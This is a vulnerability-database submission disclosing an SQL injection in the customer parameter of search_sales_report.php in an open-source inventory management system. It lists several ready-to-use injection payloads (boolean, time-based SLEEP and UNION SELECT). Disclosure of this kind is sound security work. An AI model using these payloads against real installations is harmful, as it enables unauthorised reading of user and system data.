제출 #192913: SQL injection vulnerability exists in inventory management system정보

제목SQL injection vulnerability exists in inventory management system
설명SQL injection vulnerability exists in customer parameter of app/ajax/search_sales_report.php file of inventory management system Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. Payload: &customer=-1 OR 3*2*1=6 AND 000276=000276 AND 8860=8860 -- &issuedate=issuedate or &customer=-1 OR 3*2*1=6 AND 000276=000276;SELECT SLEEP(5)# -- &issuedate=issuedate or &customer=-1 OR 3*2*1=6 AND 000276=000276 AND (SELECT 5443 FROM (SELECT(SLEEP(5)))CtWy) -- &issuedate=issuedate or &customer=-1 OR 3*2*1=6 AND 000276=000276 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,0x4c5943654c476178636366556a684563794f437944724c6e527442694f655451506567416f445376,0x7178717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - -- &issuedate=issuedate
원천⚠️ https://github.com/E1CHO/cve_hub/blob/main/PUBLIC%20CVE%20HUB/Free%20and%20Open%20Source%20inventory%20management%20system%20-%20vuln%203.pdf
사용자
 wuguanfengyue (UID 52312)
제출2023. 08. 09. AM 07:54 (3 연령 ago)
모더레이션2023. 08. 20. AM 08:50 (11 days later)
상태수락
VulDB 항목237559 [SourceCodester Inventory Management System 1.0 search_sales_report.php 고객 SQL 주입]
포인트들20

이전개요다음

Do you need the next level of professionalism?

Upgrade your account now!